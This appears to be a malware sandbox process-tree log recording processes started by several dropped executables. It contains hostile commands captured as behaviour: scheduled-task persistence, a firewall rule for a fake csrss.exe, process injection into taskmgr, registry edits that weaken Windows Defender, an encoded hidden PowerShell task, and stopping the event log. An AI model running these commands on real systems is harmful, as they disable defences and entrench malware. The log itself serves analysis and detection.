C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5148
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5160
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5204
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5212
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5224
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5244
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5264
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5280
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5288
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5324
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5336
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5380
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5408
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5444
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5468
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5492
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5504
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5524
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5580
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5600
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5628
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5652
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5712
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5728
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5744
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5752
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5768
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5796
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5808
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5816
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5824
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5832
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5860
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5872
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5884
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5892
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5924
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5940
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5968
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5976
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5988
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5996
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:6036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 5524⤵
- Program crash
PID:3048
-
-
-
-
C:\Users\Admin\Documents\GuardFox\crtjW9FdAFh1RpA0LLVUF2bK.exe"C:\Users\Admin\Documents\GuardFox\crtjW9FdAFh1RpA0LLVUF2bK.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of SetWindowsHookEx
PID:4472 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3956
-
-
-
C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe"C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5420
-
-
C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe"C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe"3⤵PID:5264
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:5940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:5508
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:4352
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:5756
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2248
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵PID:5356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5796
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:5708
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:3112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵PID:1792
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:4056
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:3096
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1784
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:2884
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2184
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:4476
-
-
-
-
-
C:\Users\Admin\Documents\GuardFox\XGRjqH3jMgozHbf6PoVnfQTH.exe"C:\Users\Admin\Documents\GuardFox\XGRjqH3jMgozHbf6PoVnfQTH.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1856 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 20803⤵
- Program crash
PID:1196
-
-
-
C:\Users\Admin\Documents\GuardFox\I9ymkTTokwU3_itoLBYFoASS.exe"C:\Users\Admin\Documents\GuardFox\I9ymkTTokwU3_itoLBYFoASS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 3403⤵
- Program crash
PID:5400
-
-
-
C:\Users\Admin\Documents\GuardFox\y1JwebHBmbC_K8bpIfqY7dAT.exe"C:\Users\Admin\Documents\GuardFox\y1JwebHBmbC_K8bpIfqY7dAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\is-IFGOF.tmp\y1JwebHBmbC_K8bpIfqY7dAT.tmp"C:\Users\Admin\AppData\Local\Temp\is-IFGOF.tmp\y1JwebHBmbC_K8bpIfqY7dAT.tmp" /SL5="$B020A,1650664,56832,C:\Users\Admin\Documents\GuardFox\y1JwebHBmbC_K8bpIfqY7dAT.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe"C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe" -i4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4744
-
-
C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe"C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe" -s4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4316
-
-
-
-
C:\Users\Admin\Documents\GuardFox\AfqN23MB7ZIBJA6OIzESsczD.exe"C:\Users\Admin\Documents\GuardFox\AfqN23MB7ZIBJA6OIzESsczD.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Users\Admin\AppData\Local\Temp\7zS7560.tmp\Install.exe.\Install.exe /GtPVdidgVAIC "525403" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:3032
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:5804
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:4396
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:5124
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:5684
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:3264
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:4948
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:4928
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guMEFEOEH" /SC once /ST 00:37:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:5472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guMEFEOEH"5⤵PID:5048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guMEFEOEH"5⤵PID:5720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bVVEtlzJxMROejURst" /SC once /ST 18:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\QlvXnnUJUMNwlEU\JgZkRLp.exe\" eu /xosite_idMQk 525403 /S" /V1 /F5⤵
- Creates scheduled task(s)
PID:4124
-
-
-
-
-
C:\Users\Admin\Documents\GuardFox\oMPmIJRvLAHQ1Yl4K6ywiUDD.exe"C:\Users\Admin\Documents\GuardFox\oMPmIJRvLAHQ1Yl4K6ywiUDD.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4600
-
-
C:\Users\Admin\Documents\GuardFox\O8XFuPPqGVPZVYUYSnSNUfon.exe"C:\Users\Admin\Documents\GuardFox\O8XFuPPqGVPZVYUYSnSNUfon.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3488 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:5836
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:5864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "PHSWJLZY"3⤵
- Launches sc.exe
PID:5876
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "PHSWJLZY" binpath= "C:\ProgramData\jndraacsywhc\todymdgvwmgb.exe" start= "auto"3⤵
- Launches sc.exe
PID:4640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5320
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "PHSWJLZY"3⤵
- Launches sc.exe
PID:5552
-
-
-
C:\Users\Admin\Documents\GuardFox\1d1mNOghqDYI4YsW8IbJNqwz.exe"C:\Users\Admin\Documents\GuardFox\1d1mNOghqDYI4YsW8IbJNqwz.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5080 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\GuardFox\1d1mNOghqDYI4YsW8IbJNqwz.exe" & del "C:\ProgramData\*.dll"" & exit3⤵PID:5968
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
PID:3488
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 20003⤵
- Program crash
PID:3228
-
-
-
C:\Users\Admin\Documents\GuardFox\oI1ZPB2vxSetVpZWfFiI6Wgi.exe"C:\Users\Admin\Documents\GuardFox\oI1ZPB2vxSetVpZWfFiI6Wgi.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\wfplwfs.exeC:\Users\Admin\AppData\Local\Temp\wfplwfs.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:716 -
C:\Users\Admin\AppData\Local\Temp\2.3.1.1.exeC:\Users\Admin\AppData\Local\Temp\2.3.1.1.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4648
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 17645⤵
- Program crash
PID:5160
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 17805⤵
- Program crash
PID:3640
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 17725⤵
- Program crash
PID:2520
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5272
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 17845⤵
- Program crash
PID:2888
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 17765⤵
- Program crash
PID:3336
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 17005⤵
- Program crash
PID:2548
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 16965⤵
- Program crash
PID:6052
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 16845⤵
- Program crash
PID:2244
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:6036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 16885⤵
- Program crash
PID:1936
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 16765⤵
- Program crash
PID:2520
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 16805⤵
- Program crash
PID:1496
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:6100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 17085⤵
- Program crash
PID:5936
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 16805⤵
- Program crash
PID:5676
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:184
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 16925⤵
- Program crash
PID:652
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3520
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1436
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 16845⤵
- Program crash
PID:5824
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 16925⤵
- Program crash
PID:1880
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 16965⤵
- Program crash
PID:5560
-
-
-
